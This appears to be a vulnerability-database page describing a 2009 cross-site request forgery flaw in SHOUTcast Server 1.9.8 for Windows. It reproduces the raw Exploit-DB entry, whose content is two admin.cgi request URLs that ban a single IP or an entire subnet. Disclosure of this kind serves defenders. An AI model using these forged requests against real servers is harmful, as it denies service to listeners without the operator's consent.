header-logo
Suggest Exploit
vendor:
HOUTcast Server
by:
cp77fk4r
7,5
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: HOUTcast Server
Affected Version From: <= 1.9.8/win32
Affected Version To: <= 1.9.8/win32
Patch Exists: Yes
Related CWE: N/A
CPE: a:shoutcast:shoutcast_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

HOUTcast Server Version <= 1.9.8/win32 Cross Site Request Forgery

A Cross Site Request Forgery vulnerability exists in HOUTcast Server Version <= 1.9.8/win32. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable server. This malicious request can be used to ban a single IP or a whole subnet. The malicious request can be sent to the vulnerable server using the following URLs: Ban Single IP: http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=[p4]&banmsk=255 Ban Whole Subnet: http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=0&banmsk=0

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the vulnerable version of HOUTcast Server to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: HOUTcast Server Version <= 1.9.8/win32 Cross Site Request Forgery.
# Date: 22/12/2009
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Software Link: http://www.shoutcast.com/download
# Version: X <= 1.9.8/win32
#
#[CSRF]:
Ban Single IP: (Ex: IP: p1.p2.p3.p4)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=[p4]&banmsk=255

Ban Whole Subnet (Ex: IP: p1.p2.p3.0-255)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=0&banmsk=0
#
#
#[E0F]

Navigation

Suggest Exploit

Services By CQR